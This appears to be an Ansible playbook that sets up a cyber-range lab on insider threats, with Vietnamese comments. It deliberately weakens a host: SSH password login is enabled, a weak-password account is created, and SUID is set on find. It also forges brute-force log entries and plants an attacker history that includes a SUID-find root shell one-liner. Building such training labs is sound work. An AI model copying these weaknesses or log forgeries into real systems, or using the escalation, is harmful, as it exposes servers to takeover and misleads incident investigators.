---
- name: Dàn dựng hiện trường tấn công Insider Threat
  hosts: targets
  become: yes
  tasks:
    - name: Đảm bảo SSH cho phép đăng nhập bằng mật khẩu (Fix lỗi Web Terminal)
      lineinfile:
        path: /etc/ssh/sshd_config
        regexp: '^#?PasswordAuthentication'
        line: 'PasswordAuthentication yes'
      notify: restart ssh

    - name: Tạo tài khoản sinh viên bị lộ mật khẩu (Nạn nhân)
      user:
        name: student_test
        password: "{{ '123456' | password_hash('sha512', 'kypo_salt_1') }}"
        shell: /bin/bash

    - name: Tạo tài khoản SOC Analyst cho sinh viên làm lab
      user:
        name: analyst
        password: "{{ 'analyst123' | password_hash('sha512', 'kypo_salt_2') }}"
        shell: /bin/bash
        groups: adm  # Phân quyền cực kỳ quan trọng: Nhóm 'adm' trên Ubuntu mới có quyền đọc file /var/log/auth.log mà không cần lệnh sudo.
        append: yes

    - name: Cài đặt công cụ và thiết lập SUID cho 'find'
      file:
        path: /usr/bin/find
        mode: '4755'

    - name: Giấu Flag 3 (Chỉ root mới đọc được)
      copy:
        dest: /root/flag.txt
        content: "KYPO{suid_find_privesc_success}"
        mode: '0600'

    - name: Giả mạo log tấn công Brute-force SSH vào /var/log/auth.log
      shell: |
        echo "$(date -d '1 hour ago' '+%b %d %H:%M:%S') target-server sshd[1020]: Failed password for invalid user root from 10.10.55.200 port 33012 ssh2" >> /var/log/auth.log
        echo "$(date -d '59 mins ago' '+%b %d %H:%M:%S') target-server sshd[1025]: Failed password for student_test from 10.10.55.200 port 33044 ssh2" >> /var/log/auth.log
        echo "$(date -d '58 mins ago' '+%b %d %H:%M:%S') target-server sshd[1030]: Accepted password for student_test from 10.10.55.200 port 33088 ssh2" >> /var/log/auth.log
        echo "$(date -d '58 mins ago' '+%b %d %H:%M:%S') target-server sshd[1030]: pam_unix(sshd:session): session opened for user student_test by (uid=0)" >> /var/log/auth.log
      args:
        executable: /bin/bash

    - name: Giả mạo Bash History của kẻ tấn công
      lineinfile:
        path: /home/student_test/.bash_history
        create: yes
        line: |
          whoami
          id
          find . -exec /bin/sh -p \; -quit
          cat /root/flag.txt
        owner: student_test
        group: student_test

  handlers:
    - name: restart ssh
      service:
        name: ssh
        state: restarted